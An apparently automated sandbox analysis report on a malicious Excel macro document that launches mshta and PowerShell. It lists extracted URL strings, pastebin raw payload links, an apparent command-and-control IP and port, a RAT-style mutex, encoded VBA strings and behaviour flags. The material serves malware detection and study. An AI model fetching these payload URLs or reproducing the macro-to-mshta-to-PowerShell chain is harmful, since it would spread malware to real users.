Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.sogou.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.soso.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.taobao.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.target.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.tesco.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: mshta.exe, 00000002.00000002.1664648911.02DE0000.00000002.sdmp	String found in binary or memory: http://www.tiro.com;Copyright
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: mshta.exe, 00000002.00000002.1664648911.02DE0000.00000002.sdmp	String found in binary or memory: http://www.typography.netD
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.univision.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1664648911.02DE0000.00000002.sdmp	String found in binary or memory: http://www.urwpp.de
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.walmart.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1664648911.02DE0000.00000002.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: mshta.exe, 00000002.00000003.1626908042.001D4000.00000004.sdmp, mshta.exe, 00000002.00000003.1634608035.035ED000.00000004.sdmp, blog-page[1].htm.2.dr	String found in binary or memory: https://apis.google.com/js/plusone.js
Source: mshta.exe, 00000002.00000003.1626734499.0362E000.00000004.sdmp, 3722393240-widgets[1].js.2.dr	String found in binary or memory: https://csi.gstatic.com/csi
Source: mshta.exe, 00000002.00000002.1663671579.0223F000.00000004.sdmp	String found in binary or memory: https://i18n-cloud.appspot.com
Source: powershell.exe, 0000000C.00000002.1797597985.01A2F000.00000004.sdmp	String found in binary or memory: https://pastebin.com
Source: mshta.exe, 0000000D.00000002.1662132619.00301000.00000004.sdmp	String found in binary or memory: https://pastebin.com/r
Source: powershell.exe, 0000000C.00000002.1797597985.01A2F000.00000004.sdmp	String found in binary or memory: https://pastebin.com/raw/J4rMxGNR
Source: mshta.exe, 0000000D.00000002.1662799720.01999000.00000004.sdmp, mshta.exe, 0000000D.00000002.1662894861.01AD0000.00000004.sdmp	String found in binary or memory: https://pastebin.com/raw/UwmtjtG9
Source: mshta.exe, 00000015.00000002.1667908253.01439000.00000004.sdmp, mshta.exe, 00000015.00000002.1667986160.01570000.00000004.sdmp, mshta.exe, 00000015.00000002.1668071421.01602000.00000004.sdmp	String found in binary or memory: https://pastebin.com/raw/w3Y29LYH
Source: mshta.exe, 00000002.00000002.1660917204.00124000.00000004.sdmp	String found in binary or memory: https://pki.goog/repository/0
Source: powershell.exe, 0000000C.00000002.1797597985.01A2F000.00000004.sdmp	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: mshta.exe, 00000002.00000002.1663523281.021C2000.00000004.sdmp	String found in binary or memory: https://resources.blogblog.com/
Source: mshta.exe, 00000002.00000002.1663523281.021C2000.00000004.sdmp	String found in binary or memory: https://resources.blogblog.com/I
Source: mshta.exe, 00000002.00000002.1660917204.00124000.00000004.sdmp, mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp	String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png
Source: mshta.exe, 00000002.00000003.1638181476.00192000.00000004.sdmp, blog-page[1].htm.2.dr	String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png)
Source: mshta.exe, 00000002.00000003.1638181476.00192000.00000004.sdmp	String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png
Source: mshta.exe, 00000002.00000003.1628004810.0225E000.00000004.sdmp	String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png&
Source: blog-page[1].htm.2.dr	String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png)
Source: mshta.exe, 00000002.00000003.1628583296.035B7000.00000004.sdmp	String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png)3&/m15
Source: mshta.exe, 00000002.00000003.1660095619.0225E000.00000004.sdmp	String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.pngWWs
Source: mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp	String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.pngh
Source: mshta.exe, 00000002.00000002.1663760970.02277000.00000004.sdmp	String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.pngight.png
Source: mshta.exe, 00000002.00000003.1627864631.021A8000.00000004.sdmp	String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.pngs
Source: mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp	String found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.pngx
Source: mshta.exe, 00000002.00000002.1661861505.01261000.00000004.sdmp	String found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.
Source: mshta.exe, 00000002.00000002.1660917204.00124000.00000004.sdmp, mshta.exe, 00000002.00000002.1665253576.035C1000.00000004.sdmp, mshta.exe, 00000002.00000003.1627119710.03606000.00000004.sdmp, blog-page[1].htm.2.dr	String found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.png
Source: mshta.exe, 00000002.00000002.1660917204.00124000.00000004.sdmp	String found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.png-
Source: mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, mshta.exe, 00000002.00000003.1638181476.00192000.00000004.sdmp	String found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.pngID=1735791605848944865&zx=34c390eb-f2fb-4
Source: mshta.exe, 00000002.00000003.1628004810.0225E000.00000004.sdmp	String found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.pngxe
Source: mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, mshta.exe, 00000002.00000003.1638181476.00192000.00000004.sdmp	String found in binary or memory: https://resources.blogblog.com/img/triangle_ltr.gif
Source: mshta.exe, 00000002.00000002.1660917204.00124000.00000004.sdmp, mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, mshta.exe, 00000002.00000002.1663523281.021C2000.00000004.sdmp, mshta.exe, 00000002.00000002.1664070289.0248C000.00000004.sdmp, mshta.exe, 00000002.00000002.1665253576.035C1000.00000004.sdmp, mshta.exe, 00000002.00000003.1638181476.00192000.00000004.sdmp	String found in binary or memory: https://resources.blogblog.com/img/triangle_ltr.gif)
Source: mshta.exe, 00000002.00000002.1660917204.00124000.00000004.sdmp, mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, mshta.exe, 00000002.00000003.1637870561.00124000.00000004.sdmp, mshta.exe, 00000002.00000003.1638181476.00192000.00000004.sdmp	String found in binary or memory: https://resources.blogblog.com/img/triangle_open.gif
Source: mshta.exe, 00000002.00000002.1663426110.02007000.00000004.sdmp	String found in binary or memory: https://resources.blogblog.com/img/triangle_open.gif)P
Source: mshta.exe, 00000002.00000003.1626734499.0362E000.00000004.sdmp, 3722393240-widgets[1].js.2.dr	String found in binary or memory: https://resources.blogblog.com/img/widgets/icon_contactform_cross.gif
Source: mshta.exe, 00000002.00000002.1660917204.00124000.00000004.sdmp, mshta.exe, 00000002.00000002.1663417943.02000000.00000004.sdmp, mshta.exe, 00000002.00000002.1663523281.021C2000.00000004.sdmp, mshta.exe, 00000002.00000002.1665267627.035DC000.00000004.sdmp, mshta.exe, 00000002.00000003.1627864631.021A8000.00000004.sdmp, mshta.exe, 00000002.00000003.1628583296.035B7000.00000004.sdmp, mshta.exe, 00000002.00000003.1637870561.00124000.00000004.sdmp	String found in binary or memory: https://resources.blogblog.com/img/widgets/s_bottom.png
Source: mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, mshta.exe, 00000002.00000002.1664070289.0248C000.00000004.sdmp	String found in binary or memory: https://resources.blogblog.com/img/widgets/s_bottom.png)
Source: mshta.exe, 00000002.00000002.1660917204.00124000.00000004.sdmp, mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, mshta.exe, 00000002.00000002.1663671579.0223F000.00000004.sdmp, mshta.exe, 00000002.00000003.1637870561.00124000.00000004.sdmp, mshta.exe, 00000002.00000003.1638181476.00192000.00000004.sdmp, mshta.exe, 00000002.00000003.1657227412.02810000.00000004.sdmp	String found in binary or memory: https://resources.blogblog.com/img/widgets/s_top.png
Source: mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, mshta.exe, 00000002.00000002.1663340745.01E98000.00000004.sdmp, mshta.exe, 00000002.00000003.1638181476.00192000.00000004.sdmp	String found in binary or memory: https://resources.blogblog.com/img/widgets/s_top.png)
Source: mshta.exe, 00000002.00000002.1663523281.021C2000.00000004.sdmp	String found in binary or memory: https://resources.blogblog.com/m
Source: mshta.exe, 00000002.00000002.1663493428.02198000.00000004.sdmp	String found in binary or memory: https://resources.blogblog.e
Source: mshta.exe, 00000002.00000002.1663671579.0223F000.00000004.sdmp	String found in binary or memory: https://s.ytimg.com
Source: mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, powershell.exe, 0000000C.00000002.1792091760.00180000.00000004.sdmp, powershell.exe, 0000000C.00000002.1806800198.04320000.00000004.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: mshta.exe, 00000002.00000002.1665253576.035C1000.00000004.sdmp	String found in binary or memory: https://treffictesgn.blogsp
Source: blog-page[1].htm.2.dr	String found in binary or memory: https://treffictesgn.blogspot.com/
Source: mshta.exe, 00000002.00000002.1661035852.00169000.00000004.sdmp	String found in binary or memory: https://treffictesgn.blogspot.com/Se
Source: mshta.exe, 00000002.00000002.1661035852.00169000.00000004.sdmp	String found in binary or memory: https://treffictesgn.blogspot.com/Uk
Source: blog-page[1].htm.2.dr	String found in binary or memory: https://treffictesgn.blogspot.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1663523281.021C2000.00000004.sdmp	String found in binary or memory: https://treffictesgn.blogspot.com/p/
Source: mshta.exe, 00000002.00000003.1627864631.021A8000.00000004.sdmp	String found in binary or memory: https://treffictesgn.blogspot.com/p/7
Source: mshta.exe, 00000002.00000002.1665253576.035C1000.00000004.sdmp	String found in binary or memory: https://treffictesgn.blogspot.com/p/b
Source: blog-page[1].htm.2.dr	String found in binary or memory: https://treffictesgn.blogspot.com/p/blog-page.html
Source: mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp	String found in binary or memory: https://treffictesgn.blogspot.com/p/blog-page.html...
Source: mshta.exe, 00000002.00000003.1627864631.021A8000.00000004.sdmp	String found in binary or memory: https://treffictesgn.blogspot.com/p/blog-page.html0-widgets.js
Source: mshta.exe, 00000002.00000002.1663523281.021C2000.00000004.sdmp, mshta.exe, 00000002.00000003.1627864631.021A8000.00000004.sdmp	String found in binary or memory: https://treffictesgn.blogspot.com/p/blog-page.html0-widgets.jss
Source: mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, mshta.exe, 00000002.00000003.1638181476.00192000.00000004.sdmp	String found in binary or memory: https://treffictesgn.blogspot.com/p/blog-page.html2C:
Source: mshta.exe, 00000002.00000002.1663319141.01E83000.00000004.sdmp	String found in binary or memory: https://treffictesgn.blogspot.com/p/blog-page.html716
Source: mshta.exe, 00000002.00000002.1660917204.00124000.00000004.sdmp	String found in binary or memory: https://treffictesgn.blogspot.com/p/blog-page.htmlP
Source: mshta.exe, 00000002.00000002.1663319141.01E83000.00000004.sdmp	String found in binary or memory: https://treffictesgn.blogspot.com/p/blog-page.htmlhttps://www.blogger.com/static/v1/jsbin/864213505-
Source: mshta.exe, 00000002.00000002.1663789366.02281000.00000004.sdmp	String found in binary or memory: https://treffictesgn.blogspot.com/p/blog-page.htmll
Source: mshta.exe, 00000002.00000003.1638181476.00192000.00000004.sdmp	String found in binary or memory: https://treffictesgn.blogspot.com/p/blog-page.htmls
Source: mshta.exe, 00000002.00000002.1660866545.00103000.00000004.sdmp	String found in binary or memory: https://treffictesgn.blogspot.com/p/blog-page.htmlssC:
Source: mshta.exe, 00000002.00000002.1660917204.00124000.00000004.sdmp	String found in binary or memory: https://treffictesgn.blogspot.com/p/blog-page.htmlu
Source: mshta.exe, 00000002.00000003.1626908042.001D4000.00000004.sdmp, mshta.exe, 00000002.00000003.1636102968.035C8000.00000004.sdmp, blog-page[1].htm.2.dr	String found in binary or memory: https://treffictesgn.blogspot.com/search
Source: mshta.exe, 00000002.00000002.1665253576.035C1000.00000004.sdmp	String found in binary or memory: https://treffictesgn.blogspot1Lm1o
Source: mshta.exe, 00000002.00000003.1626734499.0362E000.00000004.sdmp, 3722393240-widgets[1].js.2.dr	String found in binary or memory: https://twitter.com/intent/tweet?text=
Source: mshta.exe, 00000002.00000002.1663671579.0223F000.00000004.sdmp	String found in binary or memory: https://www.blogblog.com;
Source: mshta.exe, 00000002.00000003.1636102968.035C8000.00000004.sdmp	String found in binary or memory: https://www.blogger.c
Source: blog-page[1].htm.2.dr	String found in binary or memory: https://www.blogger.com
Source: mshta.exe, 00000002.00000002.1661035852.00169000.00000004.sdmp	String found in binary or memory: https://www.blogger.com/
Source: blog-page[1].htm.2.dr	String found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=1735791605848944865&zx=34c390eb-f
Source: mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, mshta.exe, 00000002.00000003.1627969280.02223000.00000004.sdmp	String found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=1735791605848944865&zx=34c390eb-f2fb-
Source: blog-page[1].htm.2.dr	String found in binary or memory: https://www.blogger.com/static/v1/jsbin/864213505-ieretrofit.js
Source: mshta.exe, 00000002.00000002.1663523281.021C2000.00000004.sdmp, mshta.exe, 00000002.00000003.1627864631.021A8000.00000004.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/jsbin/864213505-ieretrofit.js.cssf
Source: mshta.exe, 00000002.00000002.1663523281.021C2000.00000004.sdmp, mshta.exe, 00000002.00000003.1627864631.021A8000.00000004.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/jsbin/864213505-ieretrofit.js7
Source: mshta.exe, 00000002.00000003.1627822306.02192000.00000004.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/jsbin/864213505-ieretrofit.jsl
Source: mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, mshta.exe, 00000002.00000003.1638181476.00192000.00000004.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/jsbin/864213505-ieretrofit.jsonte
Source: mshta.exe, 00000002.00000002.1663523281.021C2000.00000004.sdmp, mshta.exe, 00000002.00000003.1627864631.021A8000.00000004.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/jsbin/864213505-ieretrofit.jss
Source: mshta.exe, 00000002.00000002.1661035852.00169000.00000004.sdmp, mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, mshta.exe, 00000002.00000003.1627822306.02192000.00000004.sdmp, blog-page[1].htm.2.dr	String found in binary or memory: https://www.blogger.com/static/v1/widgets/2985278703-css_bundle_v2.css
Source: mshta.exe, 00000002.00000003.1627822306.02192000.00000004.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/widgets/2985278703-css_bundle_v2.cssG
Source: mshta.exe, 00000002.00000003.1638125951.00169000.00000004.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/widgets/2985278703-css_bundle_v2.cssr
Source: mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, mshta.exe, 00000002.00000002.1663493428.02198000.00000004.sdmp, mshta.exe, 00000002.00000002.1663523281.021C2000.00000004.sdmp, mshta.exe, 00000002.00000002.1665253576.035C1000.00000004.sdmp, mshta.exe, 00000002.00000003.1627119710.03606000.00000004.sdmp, mshta.exe, 00000002.00000003.1627864631.021A8000.00000004.sdmp, blog-page[1].htm.2.dr	String found in binary or memory: https://www.blogger.com/static/v1/widgets/3722393240-widgets.js
Source: mshta.exe, 00000002.00000003.1627822306.02192000.00000004.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/widgets/3722393240-widgets.js/
Source: mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, mshta.exe, 00000002.00000003.1638181476.00192000.00000004.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/widgets/3722393240-widgets.js735791605848944865&zx=34c390eb-f2fb-4
Source: mshta.exe, 00000002.00000002.1663319141.01E83000.00000004.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/widgets/3722393240-widgets.jsP
Source: mshta.exe, 00000002.00000002.1663493428.02198000.00000004.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/widgets/3722393240-widgets.jsZ
Source: mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp	String found in binary or memory: https://www.blogger.com/static/v1/widgets/3722393240-widgets.jsv2.cssm
Source: mshta.exe, 00000002.00000002.1663671579.0223F000.00000004.sdmp	String found in binary or memory: https://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657
Source: mshta.exe, 00000002.00000002.1663523281.021C2000.00000004.sdmp	String found in binary or memory: https://www.gstatic.co
Source: mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, mshta.exe, 00000002.00000003.1638181476.00192000.00000004.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/gplus-32.png
Source: mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, mshta.exe, 00000002.00000003.1627864631.021A8000.00000004.sdmp, mshta.exe, 00000002.00000003.1627969280.02223000.00000004.sdmp, mshta.exe, 00000002.00000003.1628583296.035B7000.00000004.sdmp, mshta.exe, 00000002.00000003.1638125951.00169000.00000004.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/gplus-32.png)
Source: mshta.exe, 00000002.00000003.1628004810.0225E000.00000004.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/gplus-32.png)0%

Uses HTTPS

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49224
Source: unknown	Network traffic detected: HTTP traffic on port 49224 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49229 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49229

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a window with clipboard capturing capabilities

Show sources

Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS

System Summary:

Document contains an embedded VBA with base64 encoded strings

Show sources

Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function QhnsRALDv, String sFPyymzViwevhlLz
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function QhnsRALDv, String sFPyymzViwevhlLz

Document contains an embedded VBA with hexadecimal encoded strings

Show sources

Source: Mcg4yE0diN.xls	Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found hex strings
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, String 3A373D3A3E483D3E
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, String 3334373938383743
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, String 3B3D374A3B3937383738
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, String 403F404B3F4E3F3E3C39
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, String 3D4A3C483E3D3E4D
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, String 3E493D3A3F383F393B3C3E3F
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function DZfiJRzM5, String 456D5D556E4D74775970
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function DZfiJRzM5, String 46727B667B744B50514C766C
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function DZfiJRzM5, String 4777727274517C6D7977
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function DZfiJRzM5, String 7A744E7C6A7C674C6B4D
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function DZfiJRzM5, String 456D5D556E4D74775970
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function DZfiJRzM5, String 46727B667B744B50514C766C
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function DZfiJRzM5, String 4777727274517C6D7977
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function DZfiJRzM5, String 7A744E7C6A7C674C6B4D
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function DZfiJRzM5, String 4777727274517C6D7977
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function DZfiJRzM5, String 7A744E7C6A7C674C6B4D
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function DZfiJRzM5, String 46727B667B744B50514C766C
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function DZfiJRzM5, String 456D5D556E4D74775970
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function DZfiJRzM5, String 54577D6D754A5E56825B76824A51
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function DZfiJRzM5, String 54577D6D754A5E56825B76824A51
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function DZfiJRzM5, String 46567454484F644F5B53
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function DZfiJRzM5, String 6B6D527C4A59746C6E714B58
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function DZfiJRzM5, String 5267434F7B476A63546D645B4F6F5A4B48
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function DZfiJRzM5, String 5267434F7B476A63546D645B4F6F5A4B48
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function DZfiJRzM5, String 6B6D527C4A59746C6E714B58
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function DZfiJRzM5, String 46567454484F644F5B53
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function SN2APmbS0, String 64594F744D6C5255
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function SN2APmbS0, String 6A6264674E4D567B
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function SN2APmbS0, String 7749757B7B5667644E
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function SN2APmbS0, String 6A6264674E4D567B
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function SN2APmbS0, String 64594F744D6C5255
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function SN2APmbS0, String 6A6264674E4D567B
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function SN2APmbS0, String 7749757B7B5667644E
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function SN2APmbS0, String 64594F744D6C5255
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function SN2APmbS0, String 7749757B7B5667644E
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function QhnsRALDv, String 7559795A5D6C7C7C4F5C
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function QhnsRALDv, String 7559795A5D6C7C7C4F5C
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function QhnsRALDv, String 7559795A5D6C7C7C4F5C
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function QhnsRALDv, String 7753687A716E5263556D
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function QhnsRALDv, String 704766484B67776A774A
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function QhnsRALDv, String 765A766F7F4A47475278
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function QhnsRALDv, String 765A766F7F4A47475278
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function QhnsRALDv, String 717777615C59504A
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function QhnsRALDv, String 704766484B67776A774A
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function QhnsRALDv, String 717777615C59504A
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function QhnsRALDv, String 4C5C7A5A4E556B555A5F
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function QhnsRALDv, String 7753687A716E5263556D
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function QhnsRALDv, String 4C5C7A5A4E556B555A5F

Powershell connects to network

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Network Connect: 104.20.208.21 443			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Network Connect: 216.170.123.122 2336			Jump to behavior

Creates mutexes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\2\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\2\BaseNamedObjects\RV_MUTEX-CEexVoqqNLCGRFb

Document contains an embedded VBA macro which executes code when the document is opened / closed

Show sources

Source: Mcg4yE0diN.xls	OLE, VBA macro line: Sub Workbook_Open()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open			Name: Workbook_Open

Document contains embedded VBA macros

Show sources

Source: Mcg4yE0diN.xls

OLE indicator, VBA macros: true

Reads the hosts file

Show sources

Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Searches for the Microsoft Outlook file path

Show sources

Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE	Jump to behavior
